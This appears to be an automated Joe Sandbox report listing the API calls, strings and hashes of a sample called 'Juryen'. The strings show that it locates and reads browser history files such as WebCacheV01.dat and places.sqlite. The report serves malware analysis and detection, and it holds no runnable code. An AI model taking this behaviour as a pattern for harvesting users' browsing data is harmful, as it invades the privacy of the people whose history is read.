                                                                      • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                    Strings
                                                                    • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                                                    • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                                                    Similarity
                                                                    • API ID: memsetwcslen$AttributesFileFolderPathSpecialwcscatwcscpy
                                                                    • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                                                    • API String ID: 2887208581-2114579845
                                                                    APIs
                                                                    • FindResourceW.KERNELBASE(?,?,?), ref: 004148C3
                                                                    • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                                                    • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                                                    • LockResource.KERNEL32(00000000), ref: 004148EF
                                                                    Similarity
                                                                    • API ID: Resource$FindLoadLockSizeof
                                                                    • String ID:
                                                                    • API String ID: 3473537107-0
                                                                    Strings
                                                                    • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                                                    Similarity
                                                                    • API ID: memset
                                                                    • String ID: only a single result allowed for a SELECT that is part of an expression
                                                                    • API String ID: 2221118986-1725073988
                                                                    APIs
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,00000000,00412966,/deleteregkey,/savelangfile,?,?,?,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004125C3
                                                                    • DeleteObject.GDI32(00000000), ref: 004125E7
                                                                    Similarity
                                                                    • API ID: ??3@DeleteObject
                                                                    • String ID: r!A
                                                                    • API String ID: 1103273653-628097481
                                                                    APIs
                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D0CC
                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D0EA
                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D108
                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D126
                                                                    Similarity
                                                                    • API ID: ??2@
                                                                    • String ID:
                                                                    • API String ID: 1033339047-0
                                                                    APIs
                                                                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                    • memcmp.MSVCRT(?,0044EC68,00000010,?,00000000,?), ref: 00444BA5
                                                                    Similarity
                                                                    • API ID: AddressProc$memcmp
                                                                    • String ID: $$8
                                                                    • API String ID: 2808797137-435121686
                                                                    APIs
                                                                      • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                      • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                      • Part of subcall function 0040E01E: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                      • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                      • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                      • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                      • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                      • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                      • Part of subcall function 0040E01E: CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                                    • CloseHandle.KERNELBASE(000000FF,000000FF,00000000,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E582
                                                                      • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                                                      • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                                                      • Part of subcall function 0040E2AB: memcpy.MSVCRT(?,-00000121,00000008,Function_0004E518,00000000,00000000,771B2EE0), ref: 0040E3EC
                                                                    • DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                                                    • CloseHandle.KERNEL32(000000FF,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5CA
                                                                      • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                                                      • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                                                      • Part of subcall function 0040E175: free.MSVCRT ref: 0040E28B
                                                                    Similarity
                                                                    • API ID: File$Handle$Close$ProcessViewmemset$CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintffreememcpywcschr
                                                                    • String ID:
                                                                    • API String ID: 1979745280-0
                                                                    APIs
                                                                      • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                      • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                                                      • Part of subcall function 00418680: free.MSVCRT ref: 004186C7
                                                                      • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                    • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                                                                    • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                                                                    • free.MSVCRT ref: 00418803
                                                                    Similarity
                                                                    • API ID: DiskFreeSpacefree$FullNamePathVersionmalloc
                                                                    • String ID:
                                                                    • API String ID: 1355100292-0
                                                                    APIs
                                                                      • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                                                      • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                                                      • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                                                      • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                                                    • memset.MSVCRT ref: 00403A55
                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                      • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                      • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                      • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                      • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
                                                                    Similarity
                                                                    • API ID: memsetwcscatwcslen$free$AttributesFilememcpywcscpy
                                                                    • String ID: history.dat$places.sqlite
                                                                    • API String ID: 2641622041-467022611
                                                                    APIs
                                                                      • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                      • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                                                      • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                                                    • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
                                                                    • GetLastError.KERNEL32 ref: 00417627
                                                                    Similarity
                                                                    • API ID: ErrorLast$File$PointerRead
                                                                    • String ID:
                                                                    • API String ID: 839530781-0
                                                                    • Opcode ID: 43cd8d8e6b63bda72f55cb56ee55d1ec8e5478229177a04f989a23650c495d71
                                                                    • Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
                                                                    • Opcode Fuzzy Hash: 43cd8d8e6b63bda72f55cb56ee55d1ec8e5478229177a04f989a23650c495d71
                                                                    • Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: FileFindFirst
                                                                    • String ID: *.*$index.dat
                                                                    • API String ID: 1974802433-2863569691
                                                                    • Opcode ID: 357f5a483d779ef34e4c4d87daa9b3f5529f5b59003a03b6604f1343cb38d30a
                                                                    • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                                                                    • Opcode Fuzzy Hash: 357f5a483d779ef34e4c4d87daa9b3f5529f5b59003a03b6604f1343cb38d30a
                                                                    • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                                                                    APIs
                                                                    • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                    • GetLastError.KERNEL32 ref: 004175A2
                                                                    • GetLastError.KERNEL32 ref: 004175A8
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast$FilePointer
                                                                    • String ID:
                                                                    • API String ID: 1156039329-0
                                                                    • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                    • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                                                                    • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                    • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                                                                    APIs
                                                                    • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                    • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                    • CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: File$CloseCreateHandleTime
                                                                    • String ID:
                                                                    • API String ID: 3397143404-0
                                                                    • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                    • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                                                                    • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                    • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                                                                    APIs
                                                                    • GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                    • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                    • GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: Temp$DirectoryFileNamePathWindows
                                                                    • String ID:
                                                                    • API String ID: 1125800050-0
                                                                    • Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                    • Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
                                                                    • Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                    • Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
                                                                    APIs
                                                                    • Sleep.KERNEL32(00000064), ref: 004175D0
                                                                    • CloseHandle.KERNELBASE(?,00000000,00000000,0045DBC0,00417C24,00000008,00000000,00000000,?,00417DE1,?,00000000), ref: 004175D9
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: CloseHandleSleep
                                                                    • String ID: }A
                                                                    • API String ID: 252777609-2138825249
                                                                    • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                    • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                                                                    • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                    • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                                                                    APIs
                                                                    • malloc.MSVCRT ref: 00409A10
                                                                    • memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040A9F2,00000002,?,00000000,?,0040AD25,00000000,?,00000000), ref: 00409A28
                                                                    • free.MSVCRT ref: 00409A31
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: freemallocmemcpy
                                                                    • String ID:
                                                                    • API String ID: 3056473165-0
                                                                    • Opcode ID: a991de929d336fb87ccd778b8aa331ddd4881c067aca3c757db3e3d2fcb11491
                                                                    • Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
                                                                    • Opcode Fuzzy Hash: a991de929d336fb87ccd778b8aa331ddd4881c067aca3c757db3e3d2fcb11491
                                                                    • Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: d
                                                                    • API String ID: 0-2564639436
                                                                    • Opcode ID: 8b82e4f5ef2bc7d58288eb7d352e73fde76eaac7bad66d9443978647085fe40b
                                                                    • Instruction ID: 98c7df9677761670a5e344a1c7628a8b006f0a2246df1cf6f5c5c4488f8f87fd
                                                                    • Opcode Fuzzy Hash: 8b82e4f5ef2bc7d58288eb7d352e73fde76eaac7bad66d9443978647085fe40b
                                                                    • Instruction Fuzzy Hash: 4591ABB0508302AFDB20DF19D88196FBBE4BF88358F50192FF88497251D778D985CB9A
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: memset
                                                                    • String ID: BINARY
                                                                    • API String ID: 2221118986-907554435
                                                                    • Opcode ID: befda4f382f52914571534526ddb8b998123412eb8d39833d396fd974aa134d0
                                                                    • Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
                                                                    • Opcode Fuzzy Hash: befda4f382f52914571534526ddb8b998123412eb8d39833d396fd974aa134d0
                                                                    • Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: _wcsicmp
                                                                    • String ID: /stext
                                                                    • API String ID: 2081463915-3817206916
                                                                    • Opcode ID: 43183885e7d34794edc347ee746a2fdce482efa4a93d67cd5162a7f7a47e1933
                                                                    • Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
                                                                    • Opcode Fuzzy Hash: 43183885e7d34794edc347ee746a2fdce482efa4a93d67cd5162a7f7a47e1933
                                                                    • Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
                                                                    APIs
                                                                      • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                    • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                      • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                      • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                      • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                                                                      • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                                                                    • CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                      • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,0040AFD7,00000000,0040B608), ref: 0040B052
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: File$ByteCharMultiWide$??2@??3@CloseCreateHandleReadSize
                                                                    • String ID:
                                                                    • API String ID: 2445788494-0
                                                                    • Opcode ID: bdc6ff89a6972445fbf15f1c87a3cbc7fe705fee6098557394266cd6fc52cd88
                                                                    • Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
                                                                    • Opcode Fuzzy Hash: bdc6ff89a6972445fbf15f1c87a3cbc7fe705fee6098557394266cd6fc52cd88
                                                                    • Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
                                                                    APIs
                                                                    Strings
                                                                    • failed to allocate %u bytes of memory, xrefs: 004152F0
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: malloc
                                                                    • String ID: failed to allocate %u bytes of memory
                                                                    • API String ID: 2803490479-1168259600
                                                                    • Opcode ID: 331d9f3b8e40439b36498a1be208f9c7b855b07c1663acfa81ecf9407a5950a4
                                                                    • Instruction ID: 0aa28a7b77b2060330bf56ee6aba3953d7f003d38adef6953018dc3bb0cf108c
                                                                    • Opcode Fuzzy Hash: 331d9f3b8e40439b36498a1be208f9c7b855b07c1663acfa81ecf9407a5950a4
                                                                    • Instruction Fuzzy Hash: 0FE026B7F01A12A3C200561AFD01AC677919FC132572B013BF92CD36C1E638D896C7A9
                                                                    APIs
                                                                    • memset.MSVCRT ref: 0041BDDF
                                                                    • memcmp.MSVCRT(00001388,?,00000010,?,00000065,00000065,?,?,?,?,?,0041F1B4,?,00000065,004381DF,00000065), ref: 0041BDF1
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: memcmpmemset
                                                                    • String ID:
                                                                    • API String ID: 1065087418-0
                                                                    • Opcode ID: fec4f8c686635726a589492d039bcbb9c6040c3e4ffa7e28f30a1ad23493d54b
                                                                    • Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
                                                                    • Opcode Fuzzy Hash: fec4f8c686635726a589492d039bcbb9c6040c3e4ffa7e28f30a1ad23493d54b
                                                                    • Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
                                                                    APIs
                                                                      • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000,?,00410C56,?), ref: 0040ECF9
                                                                      • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000,?,00410C56,?), ref: 0040EDC0
                                                                    • GetStdHandle.KERNEL32(000000F5,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00410530
                                                                    • CloseHandle.KERNELBASE(00000000,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00410654
                                                                      • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0041052B,00000000,?,00412758,00000000,00000000,?,00000000,00000000), ref: 004096EE
                                                                      • Part of subcall function 0040973C: GetLastError.KERNEL32(00000000,?,00410669,00000000,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00409750
                                                                      • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                                                      • Part of subcall function 0040973C: MessageBoxW.USER32(00000000,?,Error,00000030), ref: 00409796
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: Handle$??2@??3@CloseCreateErrorFileLastMessage_snwprintf
                                                                    • String ID:
                                                                    • API String ID: 1381354015-0
                                                                    • Opcode ID: 77225ea8c14d98a1088d43b9fd7330a512e035650861724d713e236cc530cbe1
                                                                    • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                                                                    • Opcode Fuzzy Hash: 77225ea8c14d98a1088d43b9fd7330a512e035650861724d713e236cc530cbe1
                                                                    • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
